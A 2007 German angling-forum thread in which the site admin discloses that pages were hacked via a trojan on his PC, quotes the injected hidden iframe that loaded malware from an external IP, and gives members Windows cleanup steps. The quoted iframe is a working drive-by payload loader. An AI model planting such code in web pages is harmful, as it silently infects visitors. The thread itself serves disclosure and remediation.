Sehr Wichtig !!! Bitte alle mal hier reinschauen

Hier erfährst Du Neuigkeiten zum Ausbau des Stör Anglers. Es werden Angelplätze, Gewässer , technische Neuerungen usw. vorgestellt.

Moderator: Stör-Angler

Sehr Wichtig !!! Bitte alle mal hier reinschauen

Beitragvon Stör-Angler » Mo 21. Mai 2007, 15:36

Damit das auch alle zu sehen bekommen , hab ich das hier in einen Bereich gepostet, der auch öffentlich eingesehen werden kann.

So, wie Ihr ja mitbekommen habt wurden einige Seiten des Stör-Anglers modifiziert. Nach Analyse des Falles ist das Suicherheitsloch nicht der Server gewesen , sondern sehr sicher mein Heimischer Rechner.

Dort hatte sich ( trotz superaktueller Scanner ) ein Trojaner eingenistet der wohl die Zugänge zu meinen Servern mitgeloggt hat.
Sinn des einfügen dieses Codes ist offensichtlich nicht die Webseite zu schädigen , sondern möglichst vielen Usern den Trojanern unterzujubeln.

dieser Code sah so aus :
Code: Alles auswählen
<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Den Link habe ich nun "unklickbar" gemacht - bitte nicht diese Adresse in die Browserleiste eingeben - dort wird der Trojaner nachgeladen

Leider war dieses Exemplar so aktuell , das es noch nicht von meinen Virenscanner erkannt wurde - mit 2 Tagen verspätung waren die Scannerupdates in der Lage diesen Schadcode zu erkennen.

Urheber des ganzen ist kein unbeschriebenes Blatt und Vollprofis in solchen Sachen : Das Russian Business Network die durchaus bekannt für DOS-Attacken , Emailspam und auch den Aufbau von Botnetzen sind. Mehr dazu auf [ TECCHANNEL ]

Die würden sogar Geld dafür zahlen damit Webmaster Ihren Usern diese dinger unterjubeln :evil:

In einem englischsprachigem Bericht wurde ein Server getestet auf dem ca 300 Domains lagen - über 100 davon waren mit diesem Ding infiziert.Wenn man dies nun hochrechnet kann einem Angst und Bange werden - denn dieses Programm sammelt so ziemlich alles an Logins und Passwörtern.

Während z.B. Eure Userdaten eher wertlos sind sieht es mit wichtigen Zugangsdaten ( Wie die meiner Server) natürlich ganz anders aus !

Das Problem ist nun , das Ihr Euch möglicherweise trotzdem diesen Trojaner eingefangen habt - muss nicht mal auf dem Stör-Angler passiert sein.

So mein Scanner ist der AVG 7.5 der erkennt diese Dinger ( mittlerweile) gibts auch kostenlos aber allerdings auf Englisch : Auf http://free.grisoft.com/doc/5390/lng/us ... yware-free oder der direkte Link zum Download [ AVG 7.5 Free ]
Dorschgreifer wurde gewarnt durch McAffe VirusScan 8.0

Ausserdem gabs Indizien die auf dringenden "Verdacht" hinwiesen , diese sollte Ihr unbedingt kontrollieren !!!
Um diese Schädlinge überhaupt sehen zu können , müsst Ihr in der Systemsteuerung "Ordneroptionen" öffnen . Klick dort auf den Regissterreiter "Ansicht" unter "Erweiterte Einstellungen" findet Ihr eine Liste.

Erweiterungen bei bekannten Dateitypen ausblenden -> Haken weg
Geschützte Systemdateien ausblenden -> Haken weg
Inhalte von Systemordnern anzeigen -> Haken setzen (diese Option ist bei Windows 2000 nicht vorhanden)
Versteckte Dateien und Ordner -> Alle Dateien und Ordner anzeigen

Auf Eurer Festplatte öffnet folgende Ordner :

1) C:\Recycler - löscht alle Dateien darin. Wenn sich eine Datei nicht löschen lässt und die Systemmeldung erscheint das die Datei verwendet wird , dann seid Ihr wohl infiziert . Ihr braucht keine Angst haben was kaputtzumachen, denn der Recycler dient dazu bereits gelöschte Dateien aus dem Papierkorb wieder herzustellen.

2) C:\Programme\Gemeinsame Dateien\Microsoft Shared\Web Folders wenn sich darin eine Datei namens ibm00001.dll ( Zahl kann abweichen ) befindet seid Ihr infiziert - nicht verwechseln mit dem Ordner "Web Folder" der sich ebenfalls in C:\Programme\Gemeinsame Dateien\Microsoft Shared\ befindet - denn der ist okay !!!

3) C:\ Wenn dort Dateien angezeigt werden wie z.B. systgsx.com (oder exe - Aber Vorsicht !!! löscht hier nix und mailt mir die Dateinamen ! Ich recherchiere dann ob die Okay sind oder potentielle Virusträger. Denn hier befinden sich Dateien die dringend zum Betrieb eures Rechners nötig sind.
Unter Windows XP habe ich z.B. diese Dateien die unter keinen Umständen gelöscht werden dürfen !!!
boot.ini - Für das Booten zuständig
IO.SYS - Kompatibilität für ältere Anwendungen
MSDOS.SYS - Kompatibilität für ältere Anwendungen
NTDETECT.COM - Hardware-Installationsüberwachung
ntldr - NT-Betriebsystem laden
pagefile.sys - Anlegen und Wiederherstellen von Ruhezuständen
und evtl. hiberfile.sys - Speicher für den Computer-Speicherinhalt vor dem Ruhezustand

4) c:\windows\system32 Sucht dort nach der Datei ntos.exe , sollte diese vorhanden sein, dann seid Ihr ebenfals infiziert. Diese Datei stäubt sich sehr hartnäcking gegen löschversuche. Nicht verwechseln mit ntoskrnl.exe , diese ist kein Schädling

Wenn Ihr Fragen habt oder Hilfestellung braucht , dann postet die bitte in diesen Thread , damit auch andere User diese nachlesen können. Nicht nur Stör-Angler-Besucher sondern alle die dieses Problem haben , da dieser Bereich hier auch von den Suchmaschinen aufgenommen wird.

Ich kanns nicht oft genug sagen - es war kein Stör-Angler Besuch nötig - das Ding könnt Ihr euch in den vergangenen Tagen auch sonstwo (wie wohl auch ich) eingefangen haben !!!

Downloads:
Patch für Internet Explorer : [ Hier ]
ProcessExplorer : [ Hier ]
Tool Killbox : [ Hier ]
Hijackthis : HIER

//////////////////////////// Anleitung //////////////////////////////
Im Explorer im Menü Extras -> Ordneroptionen -> Ansicht setze folgende Einstellungen:
Erweiterungen bei bekannten Dateitypen ausblenden -> Haken weg
Geschützte Systemdateien ausblenden -> Haken weg
Inhalte von Systemordnern anzeigen -> Haken setzen (diese Option ist bei Windows 2000 nicht vorhanden)
Versteckte Dateien und Ordner -> Alle Dateien und Ordner anzeigen

Installiert den Patch KB911562 für den Explorer
Startet Process Explorer und beendet den Process namens "ntos.exe".

Startet Killbox , gebt den Pfad zur Datei ntos.exe an ( c:\windows\system32\ntos.exe ) , macht einen Haken vor "Delete on Reboot" und klickt dann auf das Icon Roter Kreis mit dem weissen Kreiuz drin.

Danach bootet der Computer neu - Ihr solltet dann im abgesicherten Modus hochfahren. Dies erreicht Ihr durch drücken der F8-Taste während des hochfahrens.

Überprüft nochmals die system32 - hier sollte die ntos.exe gelöscht sein.
Löscht den Ordner "web folders" im Verzeichnis C:\Programme\Gemeinsame Dateien\Microsoft Shared\ - bitte nicht verwechseln mit den Ordner "web folder"

Löscht den kompletten Inhalt von c:\Recycler , sollte sich eine datei nicht löschen lassen , löscht die Datei mit Killbox wie schon bei der ntos.exe beschrieben.

Danach solltet Ihr natürlich nochmals Euren geupdateten Virenscanner durchlaufen lassen und zusätzlich lege ich Euch noch [urlhttp://www.safer-networking.org/de/download/index.html]Spybot[/url] ans Herz

Danach sollte Euer System wieder sauber sein.
Zuletzt geändert von Stör-Angler am Mo 4. Jun 2007, 12:01, insgesamt 4-mal geändert.
Gruss
Tino
_______________________________________
geSTÖRter 0,- Admin mit Angelinfo-Verbreitungs-Syndrom
Benutzeravatar
Stör-Angler
Angelfreund
 
Beiträge: 996
Registriert: Di 25. Jul 2006, 15:14
Wohnort: Itzehoe

Beitragvon Drill » Mo 21. Mai 2007, 15:55

danke für diese infos, die ja gleich mit anleitung gegeben wurden. ich habe mir vorgestern gleich deinen virusscann runtergeladen und bin sauber.
Die Fachsimpelei ist mir zu hoch! Sprecht bitte Angler-Amateur-Deutsch mit mir!!!
Ansonsten bringen mich die 3 bekannten Gründe zum Angeln: Natur, Gemütlichkeit und Spass

Gruss Euer Stefan
Drill
Angelfreund
 
Beiträge: 689
Registriert: Mi 9. Aug 2006, 21:20
Wohnort: Oldendorf

Beitragvon Lampro » Mo 21. Mai 2007, 16:01

Wie schon gesagt hatte ich auch den Trojaner auf meinem Rechner, nach einem Update hat AVG (AntiVir) ihn aber erkannt und ich habe ihn gelöscht.
Gruß und Petri Heil,
Fynn
Benutzeravatar
Lampro
Angelfreund
 
Beiträge: 1750
Registriert: Mi 26. Jul 2006, 08:52
Wohnort: Hamburg // Oldendorf

Beitragvon Stör-Angler » Mo 21. Mai 2007, 16:13

nach einem Update hat AVG (AntiVir) ihn aber erkannt und ich habe ihn gelöscht


Das ist das tückische - der lässt sich nicht so ohne weiteres löschen - zumindest nicht das Exemplar mit dem ich das Vergnügen hatte. Daher unbedingt die Verzeichnisse trotzdem kontrollieren !

Auch wenn der Virenscanner eine Datei erkannt und gelöscht hat besteht durchaus die Möglichkeit das sich ein Programm aus dem Rechner befindet das die gelöschte Datein immer wieder neu schreibt.
Gruss
Tino
_______________________________________
geSTÖRter 0,- Admin mit Angelinfo-Verbreitungs-Syndrom
Benutzeravatar
Stör-Angler
Angelfreund
 
Beiträge: 996
Registriert: Di 25. Jul 2006, 15:14
Wohnort: Itzehoe

Beitragvon Carp4Fun » Mo 21. Mai 2007, 20:35

Hi Tino,

Mal ne blöde Frage dazu:
Ich nutze das Programm avast! und bis dato wurde mir nix gemeldet. Macht es sonst vielleicht Sinn, dein empfohlenes Programm einfach zusätzlich mal durchlaufen zu lassen, oder sind da im Parallelbetrieb Probleme zu erwarten? Ansonsten hätte ich hier auch noch ne Norton-Software zu liegen, die mir von meinem Anbieter mal "kostenpflichtig untergejubelt" wurde (allerdings noch nie installiert und eigentlich wollt ich das auch schon längst mal kündigen... :? )
Gruß
Sascha
Benutzeravatar
Carp4Fun
Angelfreund
 
Beiträge: 2171
Registriert: Do 20. Jul 2006, 22:10
Wohnort: Kellinghusen

Beitragvon salora » Di 22. Mai 2007, 09:21

Ich arbeite mit McAfee und bei mir erschien sofort eine Fehlermeldung die ich gleich an Dorschgreifer bei uns im Board weitergeleitet hatte. Dieser Scanner schein der einzige zu sein der wirklich aktuell ist, auch wenn er etwas kostet.
Gruss & Petri Uwe
Benutzeravatar
salora
 
Beiträge: 12
Registriert: Fr 20. Okt 2006, 14:51
Wohnort: Herzogtum Lauenburg

Beitragvon Stör-Angler » Di 22. Mai 2007, 09:56

Moin Sascha,
auch wenn avast eines der "Schicken" Programme ist, ist die Erkennung von Schadprogrammen nicht so gut. Hier der Test dazu.

Norton ist auch nicht so dolle.Beide Programme sind relativ Schwach in der Virenheuristik.

Damit solltest Du auf jeden Fall den AVG oder auch Avira testen - auch Avira gibts kostenlos - Link


Die Kaufversion von Avira ist nochmal ein ganzes Stück besser ( und damit Sicherer !) . Einen sehr guten Ruf geniesst auch das Programm Bitdefender , ich persönlich kenne es allerdings nicht.

Von daher würde ich Dir raten avast zu entfernen , da dies keine Chance gegen die Konkurrenzprodukte hat. 2 Scanner parallel laufen zu lassen ist grundsätzlich nicht empfehlenswert. Besser zu einem Virenscanner ist es zum Beispiel Spybot - Search & Destroy zu installieren - Noch sehr viel besser ist Spy Sweeper , das aber den Aufbau von Internetseiten drastisch verlangsamt und das Surfen nur noch wenig Spass macht - aber die Erkennung ist derzeit Spitze.
Gruss
Tino
_______________________________________
geSTÖRter 0,- Admin mit Angelinfo-Verbreitungs-Syndrom
Benutzeravatar
Stör-Angler
Angelfreund
 
Beiträge: 996
Registriert: Di 25. Jul 2006, 15:14
Wohnort: Itzehoe

Beitragvon Jochi » Di 22. Mai 2007, 10:50

Mein "AVIRA" hat ihn auch gefunden und gelöscht. Aber vielen dank für den Tipp, die Verzeichnisse doch noch zusätzlich zu überprüfen. Ich hätte auch gedacht, dass mit dieser Löschung dann alles i.O. wäre...
Gruß Jochi

Dabei seit 19.07.2006

AV Forelle Bad Bramstedt
Benutzeravatar
Jochi
Angelfreund
 
Beiträge: 674
Registriert: Mi 19. Jul 2006, 16:41
Wohnort: Bad Bramstedt

Beitragvon Lampro » Di 22. Mai 2007, 11:51

Daher unbedingt die Verzeichnisse trotzdem kontrollieren !


Ok, habe ich gemacht. Ich habe wie in Punkt 2.) von Dir beschrieben nachgeguckt. Und siehe da ich habe die Datei "ibm00003.dll" gefunden...

Wie soll ich vorgehen? Einfach "Rechtsklick" - "löschen"? Ich meine, lässt sich das Ding so wirklich einfach löschen?
Gruß und Petri Heil,
Fynn
Benutzeravatar
Lampro
Angelfreund
 
Beiträge: 1750
Registriert: Mi 26. Jul 2006, 08:52
Wohnort: Hamburg // Oldendorf

Beitragvon Stör-Angler » Di 22. Mai 2007, 12:30

Moin Lampro,
nochmal zur Sicherheit :

Der Ordner muss Web Folders heissen.

Es existiert wie gesagt auch ein Ordner Web Folder (ohne s am Folder).

Der Pfad muss also so aussehen : C:\Programme\Gemeinsame Dateien\Microsoft Shared\Web Folders

Wenn es dieser Pfad ist, dann lösche mal die ibm00003.dll.
Danach surfst Du ein bischen mit dem Internet Explorer und guckst dann wieder in diesen Ordner. Wenn dann wieder eine ibm-DLL dort ist, dann bist Du infiziert.

Installiere Dir einen von den oben empfohlenen Virenscannern und bring ihn mittels update auf den neuesten Stand.Das aktuelle AVG meckert todsicher über die ibm0003.dll - auch wenn der Trojaner versucht diese neu zu schreiben.

Das eigentliche Schadprogramm befindet sich woanders.
Als erstes schau mail bitte unter c:\windows\system32 ob sich dort eine Datei names ntos.exe findet - falls ja bitte löschen und danach gleich den Papierkorb leeren.

Wenns so nicht geht , dann mache es so :

Lade Dir das Programm Killbox herunter [ Hier ]

Öffne die Systemsteuerung und klicke auf "System" . Im neuen Fenster dann auf den Registerreiter "Systemwiederherstellung".
Da machste einen Haken in "Systemwiederherstellung auf allen Laufwerken deaktivieren"

Lade Dir den Sicherheitspatch für den Internet Explorer [ Hier ] und installiere diesen.

Danach startest Du Deinen PC neu und drückst während des Hochfahrens die F8-Taste und Du kommst in ein Boot-Auswahlmenü. Dort wähle "Abgesicherter Modus" .
Dann sollte (wenn angelegt) die Möglichkeit bestehen sich als Administrator anzumelden.

Nun startes Du Killbox und Klicks auf den kleinen Ordner neben der Eingabezeile unter "Full Path of File to Delete" und navigierst zur ibm00003.dll.
Dann noch nen Haken vor "End Explorer Shell While Killing File"

Zuletzt auf den roten Kreis mit dem weissen Kreuz drin.

Danach sollte das System wieder sauber sein.

System wieder neu starten und normal hochfahren und nach einer kurzen Surfrunde nochmals gucken ob die ibm00003.dll doch wieder da ist , sicher ist sicher.
Gruss
Tino
_______________________________________
geSTÖRter 0,- Admin mit Angelinfo-Verbreitungs-Syndrom
Benutzeravatar
Stör-Angler
Angelfreund
 
Beiträge: 996
Registriert: Di 25. Jul 2006, 15:14
Wohnort: Itzehoe

Nächste

Zurück zu Neu auf dem Stör Angler

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 2 Gäste

cron